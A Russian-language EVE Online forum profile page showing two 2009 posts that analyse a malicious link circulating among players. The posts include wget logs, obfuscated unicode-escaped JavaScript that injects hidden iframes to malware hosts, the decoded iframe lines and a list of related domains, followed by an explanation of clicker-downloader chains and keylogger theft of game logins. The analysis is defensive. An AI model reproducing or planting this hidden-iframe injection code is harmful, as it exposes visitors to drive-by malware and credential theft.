Перейти к содержимому

Донат
На хостинг 		ISK за переводы
до 75kk за 1000зн. 		Хроники EVE
Сборник 		Новичкам
Полезная информация

Maba

Фотография Maba

Maba

Регистрация: 11 Jan 2008
Не на форуме Активность: Jul 30 2013 12:18
-----

#555843 Осторожно, возможные взломы аков

Написано Maba на 29 April 2009 - 3:58

вот что удалось нарыть по той ссылке, что  пробегала недавно по аськам с предложением заценить "клевую тачку"
http://yehoshua-m.com/images/auto.gif

--04:26:09--  http://yehoshua-m.com/images/auto.gif
		   => `auto.gif'
Resolving yehoshua-m.com... done.
Connecting to yehoshua-m.com[69.65.33.41]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 736 [text/html]

	0K													   100%	4.61 KB/s

04:26:10 (4.61 KB/s) - `auto.gif' saved [736/736]

содержимое этого ".gif" по сути - HTML без хедера с линком на картинку и строкой Java-Script, записаной в уникод-последовательностях

<img src="WorleyVision5.jpg">  <script type="text/javascript">document.write('
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022
\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006c\u0069\u006e\u0065\u006e\u0065
\u0074\u007a\u002e\u0063\u006f\u006d\u002f\u0073\u0074\u0061\u0074\u0073\u002f
\u0072\u0075\u0031\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c
\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f
\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')
</script>

на нормальном языке она читается как 

<iframe src="http://linenetz.com/stats/ru1.php" style="display:none"></iframe>

надо же, намек на отечественные разработки :) сдернем этот ru1.php
--04:19:31--  http://linenetz.com/stats/ru1.php
		   => `ru1.php'
Resolving linenetz.com... done.
Connecting to linenetz.com[213.182.197.236]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 604 [text/html]

	0K													   100%  589.84 KB/s

04:19:31 (589.84 KB/s) - `ru1.php' saved [604/604]

он содержит нижеследующее и детектится "касперским" как:
Trojan program Trojan-Clicker.HTML.IFrame.bk - File: D:\Temp\vir\ru1.php

<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061
\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a
\u002f\u002f\u006d\u0069\u006c\u006c\u0069\u006f\u006e\u002d\u0064\u006f\u006c
\u006c\u0061\u0072\u0073\u002e\u0063\u006e\u002f\u0061\u0064\u0077\u006f\u0072
\u0064\u0073\u0032\u0032\u0032\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070
\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069
\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c
\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')
</script>

что переводится как
<iframe src="http://million-dollars.cn/adwords222/index.php" style="display:none"></iframe>

а вот дальше с наскоку проследить не удалось, wget проскакивает по этому "миллион долларз" и его швыряет по референсу на гугль :(
--04:11:28--  http://million-dollars.cn/adwords222/index.php
		   => `index.php'
Resolving million-dollars.cn... done.
Connecting to million-dollars.cn[61.235.117.67]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://google.com/ [following]
--04:11:29--  http://google.com/
		   => `index.html'
Resolving google.com... done.
Connecting to google.com[74.125.67.100]:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.google.com/ [following]
--04:11:29--  http://www.google.com/
		   => `index.html'
Resolving www.google.com... done.
Connecting to www.google.com[74.125.43.99]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.google.ru/ [following]
--04:11:30--  http://www.google.ru/
		   => `index.html'
Resolving www.google.ru... done.
Connecting to www.google.ru[74.125.43.147]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

	0K .....													 5.53 MB/s

04:11:30 (5.53 MB/s) - `index.html' saved [5794]
больше под рукой ничего нет, так что посмотреть чем занимается скрипт
million-dollars.cn/adwords222/index.php не вышло

зато вот, что поведал про домен linenetz.com сайтик http://openrbl.org

IP: 213.182.197.236  
LATVIA / RIGA,  RIGA (lat. 56.95, long. 24.1, time zone +02:00)
Net Speed : COMP
ISP : REAL_HOST_NET
IDD Code 371

JUNIK-RIGA-LV JUNIKNET Autonomous System JUNIK ISP Network Riga, LATVIA

данный IP известен также как:

7ioi.biz
8addition.org
add-content-filter.info
b9n.org
coloer.biz
fiolan.com
forka.org
fp3s.biz
ldj5.biz
lj3q.biz
mail.8addition.org
people-vip.ru
www.lj3q.biz
  • 1


#555833 Осторожно, возможные взломы аков

Написано Maba на 29 April 2009 - 2:07

Trojan-Clicker.HTML.IFrame.bk
вирус старый (2007 год), относился к разряду Internet-Clicker возможно его переприспособили на новый лад

действовал он так:
ссылка на ресурс (недавно тоже видел ссылку на эту "машинку" - пробегало от кого-то по аське) имеет в себе скрытый фрэйм (как бы еще одно окно браузера, только  мы его не видим) с определенным адресом, по которому находится страничка-менеджер, содержащая дальнейшие инструкции (на платформенно-независимом языке), которые выполнит браузер, открывший данную страничку, в 2007 году она заливала на комп во временный каталог исполняемый Win32 файл и запускала его (судя по всему это была программка из разряда Trojan-Downloader или Trojan-Dropper), там же находилась еще одна ссылка на следующую страничку со следующей порцией инструкций (и так далее по цепочке, длина которой может быть любой)


для того, чтобы что-либо увести у вас из EVE - инструкций, написаных для браузера однозначно недостаточно, необходимо заслать на ваш компьютер и запустить исполняемый файл из разряда клавиатурных шпионов, который перехватит и сворует у вас вводимые с клавиатуры при логине в игру пароли, а заодно и файл со списком использованых аккаунтов, что сохраняет клиент игры (также возможен вариант установки шпиона ввиде плагина для браузера, который будет ждать пока вы зайдете в личный кабинет на офф-сайте и сворует логин/пароль в этот момент) - любой современный браузер как минимум спрашивает подтверждения на подобные действия, за исключением случаев, когда у вас посещаемый сайт находится в списке довененных сайтов (добавляется пользователем вручную), либо подписан сертификатом, который пользователь (также вручную) установил в раздел доверенных сертификатов

мораль такова - никогда не жмите OK не прочитав о чем просят, если не понимаете что  предлагают, то жмите "отмену" или вовсе закройте окно  браузера - 100% гарантия, что  корме вирусов и троянов нефиг ловить на подобных страничках

P.S. "чебурашки" и "ежики в тумане" на русском сайте Google никакого отношения к вирусу не имеют, это плод труда чисто национальных укуренных ПиАрщиков, возможно все как раз наоборот - вирус подсовывает вместо Google (ну и других популярных поисковиков) их "подправленные" варианты, внешне выглядящие точно так же, но  вот ссылки ведут уже совсем по другим адресам, просто  на гугле эта дурацкая реклама есть не всегда или динамически меняется, а на подставном - она всегда в наличии и одна и та же
  • 1


  1. EVE-RU FORUM
  2. Просмотр профиля: Рейтинг постов: Maba